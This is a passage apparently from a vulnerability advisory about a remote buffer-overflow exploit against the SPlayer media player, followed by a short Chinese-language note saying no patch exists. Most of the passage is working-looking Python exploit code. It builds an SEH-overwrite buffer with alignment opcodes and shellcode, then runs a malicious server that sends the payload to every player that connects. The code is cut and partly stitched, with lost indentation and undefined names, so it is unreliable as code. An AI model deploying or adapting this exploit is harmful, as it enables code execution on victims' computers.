#Begin evil buffer
evil = "\x41" * 2073
evil += "\x61\x73" #popad/nop align
evil += "\x25\x73" #SE handler - ppr/splayer.exe [0x00730025]
#Close the blinds
evil += "\x73" #nop/align
evil += "\x55" #push ebp
evil += "\x73" #nop/align
evil += "\x58" #pop eax
evil += "\x73" #nop/align
#Align to EAX/execute shellcode
evil += "\x05\x19\x11" #add eax, 0x11001900
evil += "\x73" #nop/align
evil += "\x2d\x11\x11" #sub eax, 0x11001100
evil += "\x73" #nop/align
evil += "\x50" #push eax
evil += "\x73" #nop/align
evil += "\xc3" #ret
evil += "\x46" * 1004 #align shellcode->EAX
#End evil buffer
padding = "\x44" * (30000 - len(pre + evil + calcshell)) + "\r\n"
payload = pre + evil + calcshell + padding
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((bindaddr, bindport))
s.listen(5)
print "[+] Listening for incoming connections on port: %d" % bindport + " ..."
except:
print "[!] Error binding socket, is the port already in use?\r\n[-] Exiting"
sys.exit()
# Note: SPlayer seems to connect/send a GET request twice every time a URL is processed
# and it crashes after the second request
while 1:
(clientsock, address) = s.accept()
print "[*] New connection from", address[0]
clientsock.recv(1024)
sent = clientsock.send(payload)
print "[+] Payload sent successfully [size: %d bytes]" % sent
sent = 0
print "[-] Closing connection to", address[0]
clientsock.close()
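if __name__ == "__main__":
    # Build the client once and reuse it: the original constructed two
    # separate Client objects, so about() and run() never shared state.
    # run() binds a listening socket and serves the crafted SEH-overwrite
    # payload to every peer that connects, so only launch this on a host/port
    # you intend to expose to the target.
    client = Client()
    client.about()
    client.run()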
建议:
--------------------------------------------------------------------------------
厂商补丁:
Splayer
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本。在补丁发布之前,建议不要使用 SPlayer 打开来源不可信的网络 URL 或播放列表:本漏洞的触发方式是播放器向攻击者控制的服务器发起请求并接收恶意响应,不访问不可信地址即可避免触发: